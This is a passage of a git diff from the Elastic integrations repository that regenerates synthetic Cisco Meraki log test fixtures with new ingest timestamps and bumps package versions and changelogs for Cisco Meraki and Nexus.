"ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "tore 1503445970.elits consequa events dhcp release for mac 01:00:5e:50:48:c4", "event": { - "ingested": "2021-09-07T12:47:57.558468300Z" + "ingested": "2021-12-14T14:40:26.865205754Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": 
[ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "undeom uamnihi.risnis uov_ ids-alerts isn ids-alerts signature=sBono priority=loremqu timestamp=1504680924.teturprotocol=rdp src=10.94.6.140 dst=10.147.15.213message: uptat", "event": { - "ingested": "2021-09-07T12:47:57.558472100Z" + "ingested": "2021-12-14T14:40:26.865206188Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "itasper 1505915878.uae mve_ flows obeata flows block src=10.230.6.127 dst=10.111.157.56 mac=01:00:5e:39:a7:fc protocol=icmp type=aliquamq ", "event": { - "ingested": "2021-09-07T12:47:57.558476200Z" + "ingested": "2021-12-14T14:40:26.865206599Z" }, - "tags": [ + "ecs": { + "version": "1.12.0" + }, + "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "archite 1507150832.remq veniamq events aid=occ arp_resp=oloreseo arp_src=iruredol auth_neg_dur=veniamqu auth_neg_failed=licaboN channel=atquo dns_req_rtt=cupi dns_resp=strude dns_server=eritin duration=85.513000 full_conn=litsedq identity=nderiti ip_resp=ntNe ip_src=10.179.40.170 is_8021x=olorema is_wpa=mollita last_auth_ago=tatem radio=iae reason=quido rssi=emip type=inBC vap=mol client_mac=01:00:5e:58:2d:1c client_ip=10.153.81.206 instigator=rsita http_resp=nsequun dhcp_lease_completed=eetd dhcp_ip=illu dhcp_server=iatqu dhcp_server_mac=lorsi dhcp_resp=repreh url=https://www.example.net/irured/illumqui.txt?tionula=ritqu#ecatcupi category0=uamei server=10.193.219.34 vpn_type=onse connectivity=olorem", "event": { - "ingested": "2021-09-07T12:47:57.558480Z" + "ingested": "2021-12-14T14:40:26.865206996Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "umwritte 1508385787.vol oremquel_appliance events MAC 01:00:5e:16:5e:b1 and MAC 01:00:5e:ee:e8:77 both claim IP: 10.255.199.16", "event": { - "ingested": 
"2021-09-07T12:47:57.558483800Z" + "ingested": "2021-12-14T14:40:26.865207395Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "unte 1509620741.uamnihil llam_appliance events MAC 01:00:5e:ee:1d:77 and MAC 01:00:5e:f1:21:bd both claim IP: 10.94.88.5", "event": { - "ingested": "2021-09-07T12:47:57.558487800Z" + "ingested": "2021-12-14T14:40:26.865207795Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "esci 1510855695.uov quaeab_ events IDS: moles", "event": { - "ingested": "2021-09-07T12:47:57.558491600Z" + "ingested": "2021-12-14T14:40:26.865208196Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "accusa 1512090649.natu liquid events IDS: enim", "event": { - "ingested": "2021-09-07T12:47:57.558495700Z" + "ingested": "2021-12-14T14:40:26.865208591Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "dquiaco nibus.vitaed ser security_event etconsec signature=elillum priority=upt timestamp=1513325604.rnat dhost=01:00:5e:01:60:e0 direction=internal protocol=ipv6 src=10.90.99.245 dst=10.124.63.4 message:pta", "event": { - "ingested": "2021-09-07T12:47:57.558499700Z" + "ingested": "2021-12-14T14:40:26.865208985Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "tetura 1514560558.imadmini moe_appliance events content_filtering_block url='https://mail.example.net/uat/lupta.html?uptassit=ncidi#tlabori' category0='laudan' server='10.249.7.146:2010'", "event": { - "ingested": "2021-09-07T12:47:57.558503600Z" + "ingested": "2021-12-14T14:40:26.865209376Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - 
"version": "1.12.0" - }, "message": "lapar 1515795512.ritati edquia_appliance events IDS: itesse", "event": { - "ingested": "2021-09-07T12:47:57.558507400Z" + "ingested": "2021-12-14T14:40:26.865209879Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "amvolu mip.tion tobeatae_ security_event Utenima security_event iqua signature=luptat priority=deriti timestamp=1517030466.sintocc dhost=01:00:5e:c9:b7:22 direction=inbound protocol=icmp src=10.196.96.162 dst=10.81.234.34 message:equuntur", "event": { - "ingested": "2021-09-07T12:47:57.558511800Z" + "ingested": "2021-12-14T14:40:26.865210286Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "uide 1518265421.scivel henderi_appliance events IDS: iusmodt", "event": { - "ingested": "2021-09-07T12:47:57.558515600Z" + "ingested": "2021-12-14T14:40:26.865210702Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "tiumd 1519500375.ntmoll mexer events dhcp lease of ip 10.40.101.224 from server mac 01:00:5e:0a:df:72 for client mac 01:00:5e:7c:01:ab with hostname remips188.api.invalid from router 10.78.199.43 on subnet ehender with dns ilmole", "event": { - "ingested": "2021-09-07T12:47:57.558519500Z" + "ingested": "2021-12-14T14:40:26.865211255Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "runtmo 1520735329.ore isund_appliance events MAC 01:00:5e:17:87:3e and MAC 01:00:5e:5f:c1:3e both claim IP: 10.244.29.119", "event": { - "ingested": "2021-09-07T12:47:57.558523400Z" + "ingested": "2021-12-14T14:40:26.865211726Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "tutlabor 1521970284.reseosq gna_ flows pteurs 
flows deny src=10.83.131.245 dst=10.39.172.93 mac=01:00:5e:c4:12:c7 protocol=udp type=uido ", "event": { - "ingested": "2021-09-07T12:47:57.558528700Z" + "ingested": "2021-12-14T14:40:26.865212126Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "osquira 1523205238.umd sciveli_ events dhcp lease of ip 10.86.188.179 from server mac 01:00:5e:48:4b:78 for client mac 01:00:5e:7e:cd:15 from router 10.201.168.116 on subnet umiure with dns laborum", "event": { - "ingested": "2021-09-07T12:47:57.558532700Z" + "ingested": "2021-12-14T14:40:26.865212521Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "umdolors 1524440192.lumdo acom_ security_event umexercisecurity_event duntut url=https://mail.example.com/prehend/eufug.htm?eufug=est#civelits src=10.148.211.222:2053 dst=10.122.204.151:3903 mac=01:00:5e:c3:a0:dc name=ine sha256=urerepre disposition=asnulap action=deny", "event": { - "ingested": "2021-09-07T12:47:57.558536600Z" + "ingested": "2021-12-14T14:40:26.865212918Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "atnul 1525675146.umfugi stquidol_ flows luptatem flows accept", "event": { - "ingested": "2021-09-07T12:47:57.558540600Z" + "ingested": "2021-12-14T14:40:26.865213336Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "essequam ueporro.aliqu upt ids-alerts signature=orum priority=Bonoru timestamp=1526910101.madminimprotocol=ipv6-icmp src=10.97.46.16 dst=10.120.4.9message: teni", "event": { - "ingested": "2021-09-07T12:47:57.558544500Z" + "ingested": "2021-12-14T14:40:26.865213729Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "lorsitam 
tanimid.onpr litseddo_ ids-alerts oremqu ids-alerts signature=idex priority=radip timestamp=1528145055.uptaprotocol=ipv6-icmp src=10.171.206.139 dst=10.165.173.162message: lestia", "event": { - "ingested": "2021-09-07T12:47:57.558548100Z" + "ingested": "2021-12-14T14:40:26.865214142Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "inibusB 1529380009.nostrud cteturad events dhcp lease of ip 10.150.163.151 from server mac 01:00:5e:72:b7:79 for client mac 01:00:5e:f2:d3:12 with hostname uames4985.mail.localdomain from router 10.144.57.239 on subnet oinBCSed with dns orem", "event": { - "ingested": "2021-09-07T12:47:57.558551700Z" + "ingested": "2021-12-14T14:40:26.865214537Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "eritq rehen.ipsamvol elillum_ ids-alerts tco ids-alerts signature=tvol priority=oluptate timestamp=1530614963.lit shost=01:00:5e:ac:6d:d3 direction=unknown protocol=igmp src=10.52.202.158 dst=10.54.44.231 message: Ute", "event": { - "ingested": "2021-09-07T12:47:57.558555400Z" + "ingested": "2021-12-14T14:40:26.865214935Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "runtm 1531849918.eturadip olorsi_ events MAC 01:00:5e:67:1d:0f and MAC 01:00:5e:f0:a9:cd both claim IP: 10.101.183.86", "event": { - "ingested": "2021-09-07T12:47:57.558559300Z" + "ingested": "2021-12-14T14:40:26.865217350Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "inesciu 1533084872.quid atcupid_ flows orem flows src=10.71.22.225 dst=10.4.76.100 protocol=ggp pattern: allow serrorsi", "event": { - "ingested": "2021-09-07T12:47:57.558563100Z" + "ingested": "2021-12-14T14:40:26.865217768Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ 
"preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "lamco 1534319826.cit siar events MAC 01:00:5e:80:cd:ca and MAC 01:00:5e:45:aa:51 both claim IP: 10.83.130.95", "event": { - "ingested": "2021-09-07T12:47:57.558567Z" + "ingested": "2021-12-14T14:40:26.865218176Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "hite 1535554780.ianonnum nofdeFi events aid=henderit arp_resp=remq arp_src=unt auth_neg_dur=tla auth_neg_failed=arch channel=lite dns_req_rtt=ugia dns_resp=meum dns_server=borumSec duration=91.439000 full_conn=nvolupta identity=tev ip_resp=nre ip_src=10.2.110.73 is_8021x=eturadip is_wpa=ent last_auth_ago=rumSecti radio=Utenima reason=olore rssi=orumS type=olor vap=radip client_mac=01:00:5e:59:bf:36 client_ip=10.230.98.81 instigator=aaliquaU http_resp=olu dhcp_lease_completed=iameaque dhcp_ip=identsun dhcp_server=ender dhcp_server_mac=inc dhcp_resp=tect url=https://www.example.net/doconse/eni.html?mSec=smoditem#tatisetq category0=uidolo server=10.103.49.129 vpn_type=oquisq connectivity=abori", "event": { - "ingested": "2021-09-07T12:47:57.558570900Z" + "ingested": "2021-12-14T14:40:26.865218616Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "dunt 1536789735.ames amni events aid=tatio arp_resp=amquisno arp_src=modoc auth_neg_dur=magnam auth_neg_failed=uinesc channel=cid dns_req_rtt=emi dns_resp=Bonorum dns_server=lesti duration=59.289000 full_conn=iosamni identity=idu ip_resp=sis ip_src=10.158.61.228 is_8021x=tsedquia is_wpa=its last_auth_ago=umdolor radio=isiu reason=assi rssi=eserun type=rvelill vap=lupta client_mac=01:00:5e:e6:a6:a2 client_ip=10.186.16.20 instigator=tisu http_resp=remagnam dhcp_lease_completed=nvolupt dhcp_ip=meiusm dhcp_server=nidolo dhcp_server_mac=atquovol dhcp_resp=quunt url=https://www.example.com/seq/moll.htm?sunt=dquianon#urExc 
category0=tDuis server=10.132.176.96 vpn_type=aria connectivity=inim", "event": { - "ingested": "2021-09-07T12:47:57.558574800Z" + "ingested": "2021-12-14T14:40:26.865219089Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "oremeumf 1538024689.lesti sintocca events dhcp lease of ip 10.105.136.146 from server mac 01:00:5e:bb:aa:f6 for client mac 01:00:5e:69:92:4a with hostname lors2232.api.example from router 10.46.217.155 on subnet amnihil with dns orissus", "event": { - "ingested": "2021-09-07T12:47:57.558578400Z" + "ingested": "2021-12-14T14:40:26.865219495Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "nimadmin 1539259643.lumqui quiavolu flows src=10.245.199.23 dst=10.123.62.215 mac=01:00:5e:1f:7f:1d protocol=udp pattern: 0 iusmodt", "event": { - "ingested": "2021-09-07T12:47:57.558582200Z" + "ingested": "2021-12-14T14:40:26.865219902Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "rep 1540494597.remap deri flows cancel src=10.239.105.121 dst=10.70.7.23 mac=01:00:5e:8e:82:f0 protocol=ipv6 ", "event": { - "ingested": "2021-09-07T12:47:57.558586Z" + "ingested": "2021-12-14T14:40:26.865220303Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "idexeac 1541729552.nimadmin midest_appliance events aid=modt arp_resp=iduntutl arp_src=rsitam auth_neg_dur=xercit auth_neg_failed=ulpaquio channel=itqu dns_req_rtt=minimav dns_resp=smodtem dns_server=roquisqu duration=116.294000 full_conn=iquid identity=evo ip_resp=mcorpori ip_src=10.196.176.243 is_8021x=itesse is_wpa=expl last_auth_ago=essecill radio=totamre reason=rpo rssi=velites type=nonpro vap=nula client_mac=01:00:5e:99:a6:b4 client_ip=10.90.50.149 instigator=nemulla 
http_resp=asp dhcp_lease_completed=dexercit dhcp_ip=amn dhcp_server=itessequ dhcp_server_mac=porissu dhcp_resp=umd url=https://www.example.net/sectetur/edquian.html?turQuis=taevi#uames category0=tconsec server=10.16.230.121 vpn_type=laboree connectivity=udantiu", "event": { - "ingested": "2021-09-07T12:47:57.558589800Z" + "ingested": "2021-12-14T14:40:26.865220705Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "ttenb olor.quiav gna security_event Nem signature=tdolorem priority=eacomm timestamp=1542964506.upidata dhost=01:00:5e:6a:c8:f8 direction=unknown protocol=ipv6 src=10.246.152.72:4293 dst=10.34.62.190:1641 message:eve", "event": { - "ingested": "2021-09-07T12:47:57.558593600Z" + "ingested": "2021-12-14T14:40:26.865221229Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "quisn 1544199460.rem ulamcola events dhcp no offers for mac 01:00:5e:67:fc:cb", "event": { - "ingested": "2021-09-07T12:47:57.558597200Z" + "ingested": "2021-12-14T14:40:26.865221623Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "eruntmo 1545434414.nimve usanti_ events dhcp release for mac 01:00:5e:7d:de:f7", "event": { - "ingested": "2021-09-07T12:47:57.558616500Z" + "ingested": "2021-12-14T14:40:26.865222166Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "uatu 1546669369.olupta consequu_ events dhcp release for mac 01:00:5e:6b:96:f2", "event": { - "ingested": "2021-09-07T12:47:57.558622500Z" + "ingested": "2021-12-14T14:40:26.865222568Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "sitam inibusBo.illoin emUtenim ids-alerts signature=ende priority=dexea 
timestamp=1547904323.acoprotocol=ipv6 src=10.244.32.189 dst=10.121.9.5message: uptas", "event": { - "ingested": "2021-09-07T12:47:57.558627Z" + "ingested": "2021-12-14T14:40:26.865222984Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "edol 1549139277.sequuntu quameius_ events content_filtering_block url='https://www.example.com/totamrem/aliqu.htm?sBonorum=moenimi#lor' category0='auto' server='10.41.124.15:333'", "event": { - "ingested": "2021-09-07T12:47:57.558631200Z" + "ingested": "2021-12-14T14:40:26.865223381Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "antium 1550374232.remaper eseosq events dhcp no offers for mac 01:00:5e:c3:77:27", "event": { - "ingested": "2021-09-07T12:47:57.558635100Z" + "ingested": "2021-12-14T14:40:26.865223839Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "oditau 1551609186.onsec dit events MAC 01:00:5e:19:86:21 and MAC 01:00:5e:ed:ed:79 both claim IP: 10.43.235.230", "event": { - "ingested": "2021-09-07T12:47:57.558638800Z" + "ingested": "2021-12-14T14:40:26.865224290Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "asper dictasun.psa lorese_ ids-alerts ctobeat ids-alerts signature=onsec priority=idestl timestamp=1552844140.litani shost=01:00:5e:a0:b2:c9 direction=unknown protocol=icmp src=10.199.19.205:5823 dst=10.103.91.159:7116 message: ntut", "event": { - "ingested": "2021-09-07T12:47:57.558650100Z" + "ingested": "2021-12-14T14:40:26.865224695Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "estiaec 1554079094.pitlabo tas_appliance flows src=10.17.111.91 dst=10.65.0.157 mac=01:00:5e:49:c4:17 
protocol=udp pattern: 1 nostrum", "event": { - "ingested": "2021-09-07T12:47:57.558666200Z" + "ingested": "2021-12-14T14:40:26.865225099Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "ercitati 1555314049.atem serro flows cancel", "event": { - "ingested": "2021-09-07T12:47:57.558673Z" + "ingested": "2021-12-14T14:40:26.865225514Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "amquaera 1556549003.rsitamet leumiur events MAC 01:00:5e:fd:79:9e and MAC 01:00:5e:4d:c0:dd both claim IP: 10.20.130.88", "event": { - "ingested": "2021-09-07T12:47:57.558678Z" + "ingested": "2021-12-14T14:40:26.865225921Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "abill ametcon.ofdeFini tasnu_ ids-alerts tionev ids-alerts signature=uasiarch priority=velites timestamp=1557783957.uredolorprotocol=ipv6 src=10.177.64.152 dst=10.140.242.86message: temporin", "event": { - "ingested": "2021-09-07T12:47:57.558682200Z" + "ingested": "2021-12-14T14:40:26.865226509Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "lor nvolupt.dquia ora_ security_event dipi security_event ecatc signature=quovolu priority=ite timestamp=1559018911.itse shost=01:00:5e:b8:73:c8 direction=external protocol=icmp src=10.199.103.185:2449 dst=10.51.121.223:24 message:stenat", "event": { - "ingested": "2021-09-07T12:47:57.558701600Z" + "ingested": "2021-12-14T14:40:26.865226911Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "saq 1560253866.asiarch ssuscipi events MAC 01:00:5e:93:48:61 and MAC 01:00:5e:21:c2:55 both claim IP: 10.126.242.58", "event": { - "ingested": "2021-09-07T12:47:57.558709Z" + 
"ingested": "2021-12-14T14:40:26.865227318Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "tlab 1561488820.vel ionevo events dhcp release for mac 01:00:5e:8a:1a:f9", "event": { - "ingested": "2021-09-07T12:47:57.558714400Z" + "ingested": "2021-12-14T14:40:26.865227757Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "aeab 1562723774.uradipis aerat_ flows uira flows deny src=10.121.37.244 dst=10.113.152.241 mac=01:00:5e:9c:86:62 protocol=udp type=utaliqui ", "event": { - "ingested": "2021-09-07T12:47:57.558719Z" + "ingested": "2021-12-14T14:40:26.865228152Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "nesciu 1563958728.mali roinBCSe_appliance events aid=eetdolor arp_resp=tpersp arp_src=assi auth_neg_dur=rch auth_neg_failed=psa channel=nreprehe dns_req_rtt=pidatatn dns_resp=isno dns_server=luptatev duration=39.622000 full_conn=lla identity=urau ip_resp=aeca ip_src=10.247.118.132 is_8021x=atcupi is_wpa=enima last_auth_ago=uptateve radio=fugitsed reason=lumqui rssi=ectet type=ionu vap=eratv client_mac=01:00:5e:10:8b:c3 client_ip=10.153.33.99 instigator=liq http_resp=xerc dhcp_lease_completed=atisetqu dhcp_ip=squir dhcp_server=gnaaliq dhcp_server_mac=quam dhcp_resp=deriti url=https://www5.example.org/eturadi/umS.txt?mSecti=henderi#taevitae category0=tevel server=10.254.96.130 vpn_type=ita connectivity=iquipexe", "event": { - "ingested": "2021-09-07T12:47:57.558723200Z" + "ingested": "2021-12-14T14:40:26.865228629Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "tot 1565193683.reme emeumfu events aid=inBCSedu arp_resp=ita arp_src=ade auth_neg_dur=nihilmol auth_neg_failed=nder channel=ano dns_req_rtt=rumexer dns_resp=eab 
dns_server=iaconseq duration=18.963000 full_conn=eli identity=rissusci ip_resp=ectetur ip_src=10.101.13.122 is_8021x=oconsequ is_wpa=roqui last_auth_ago=oluptate radio=ntut reason=mremaper rssi=uteirur type=ntium vap=ide client_mac=01:00:5e:95:ae:d0 client_ip=10.78.143.52 instigator=ntiumdol http_resp=conse dhcp_lease_completed=aturve dhcp_ip=edqui dhcp_server=tvolu dhcp_server_mac=psu dhcp_resp=strud url=https://internal.example.org/fdeFi/ratv.htm?sequatu=tiumtot#tate category0=udanti server=10.200.98.243 vpn_type=cteturad connectivity=umq", "event": { - "ingested": "2021-09-07T12:47:57.558727Z" + "ingested": "2021-12-14T14:40:26.865229081Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "oinvento 1566428637.mporin orissusc_appliance events content_filtering_block url='https://www5.example.net/uov/pariat.htm?litsed=lumd#tiaec' category0='lorem' server='10.247.205.185:7676' client_mac='01:00:5e:6f:21:c8'", "event": { - "ingested": "2021-09-07T12:47:57.558731400Z" + "ingested": "2021-12-14T14:40:26.865229473Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "metMa emoen.ptate mipsumqu_ ids-alerts ccusa ids-alerts signature=billo priority=doloremi timestamp=1567663591.ectetura dhost=01:00:5e:0a:88:bb direction=inbound protocol=ipv6 src=10.195.90.73:3914 dst=10.147.165.30:7662 message: idents", "event": { - "ingested": "2021-09-07T12:47:57.558735200Z" + "ingested": "2021-12-14T14:40:26.865229917Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "veniamqu 1568898545.iconsequ ueporr_appliance events IDS: empor", "event": { - "ingested": "2021-09-07T12:47:57.558738800Z" + "ingested": "2021-12-14T14:40:26.865230318Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - 
"version": "1.12.0" - }, "message": "atDuisa mipsa.uas iat ids-alerts signature=hite priority=adipis timestamp=1570133500.abo dhost=01:00:5e:dd:cb:5b direction=inbound protocol=udp src=10.137.166.97 dst=10.162.202.14 message: ipsaqua", "event": { - "ingested": "2021-09-07T12:47:57.558742700Z" + "ingested": "2021-12-14T14:40:26.865230839Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "deom 1571368454.tiumdo rautod_appliance events content_filtering_block url='https://www5.example.com/illoinve/etcon.htm?nevolup=erspici#itinvolu' category0='adeserun' server='10.227.135.142:6598'", "event": { - "ingested": "2021-09-07T12:47:57.558746300Z" + "ingested": "2021-12-14T14:40:26.865231238Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "orese 1572603408.umdolore umqui_appliance events MAC 01:00:5e:f1:b8:3a and MAC 01:00:5e:37:9c:af both claim IP: 10.199.29.19", "event": { - "ingested": "2021-09-07T12:47:57.558751300Z" + "ingested": "2021-12-14T14:40:26.865231635Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "explicab 1573838362.samvolu teiru_appliance events dhcp no offers for mac 01:00:5e:b8:06:92", "event": { - "ingested": "2021-09-07T12:47:57.558755100Z" + "ingested": "2021-12-14T14:40:26.865232037Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "rissusci 1575073317.uaturQ iusmod_ events aid=mips arp_resp=iduntutl arp_src=mipsumd auth_neg_dur=eiusmo auth_neg_failed=quelauda channel=rcit dns_req_rtt=dolo dns_resp=ulamc dns_server=doe duration=10.574000 full_conn=remquela identity=toreve ip_resp=squirat ip_src=10.85.59.172 is_8021x=mto is_wpa=iae last_auth_ago=dent radio=Uten reason=tatiset rssi=sequat type=modoco vap=beataevi 
client_mac=01:00:5e:92:d8:95 client_ip=10.158.215.216 instigator=deritin http_resp=ptate dhcp_lease_completed=lloi dhcp_ip=nseq dhcp_server=equunt dhcp_server_mac=tutla dhcp_resp=usmod url=https://example.com/qui/itse.gif?orsitame=tasn#exeaco category0=upta server=10.75.122.111 vpn_type=reprehe connectivity=deFinib", "event": { - "ingested": "2021-09-07T12:47:57.558759Z" + "ingested": "2021-12-14T14:40:26.865232440Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "orr 1576308271.pre aute events IDS: rchite", "event": { - "ingested": "2021-09-07T12:47:57.558762700Z" + "ingested": "2021-12-14T14:40:26.865232855Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event"
diff --git a/packages/cisco_meraki/manifest.yml b/packages/cisco_meraki/manifest.yml
index 6eff64762e0..bde26e0acd7 100644
--- a/packages/cisco_meraki/manifest.yml
+++ b/packages/cisco_meraki/manifest.yml
@@ -1,7 +1,7 @@
 format_version: 1.0.0
 name: cisco_meraki
 title: Cisco Meraki
-version: 0.3.0
+version: 0.3.1
 license: basic
 description: Collect logs from Cisco Meraki with Elastic Agent.
 type: integration
diff --git a/packages/cisco_nexus/changelog.yml b/packages/cisco_nexus/changelog.yml
index cc7df7c7d80..3651688c472 100644
--- a/packages/cisco_nexus/changelog.yml
+++ b/packages/cisco_nexus/changelog.yml
@@ -1,4 +1,9 @@
 # newer versions go on top
+- version: "0.3.1"
+  changes:
+    - description: Regenerate test files using the new GeoIP database
+      type: bugfix
+      link: https://github.com/elastic/integrations/pull/2339
 - version: "0.3.0"
   changes:
     - description: Add 8.0.0 version constraint
diff --git a/packages/cisco_nexus/data_stream/log/_dev/test/pipeline/test-nexus.log-expected.json b/packages/cisco_nexus/data_stream/log/_dev/test/pipeline/test-nexus.log-expected.json
index 238fa7f04b4..7651a53ff87 100644
--- a/packages/cisco_nexus/data_stream/log/_dev/test/pipeline/test-nexus.log-expected.json
+++ b/packages/cisco_nexus/data_stream/log/_dev/test/pipeline/test-nexus.log-expected.json
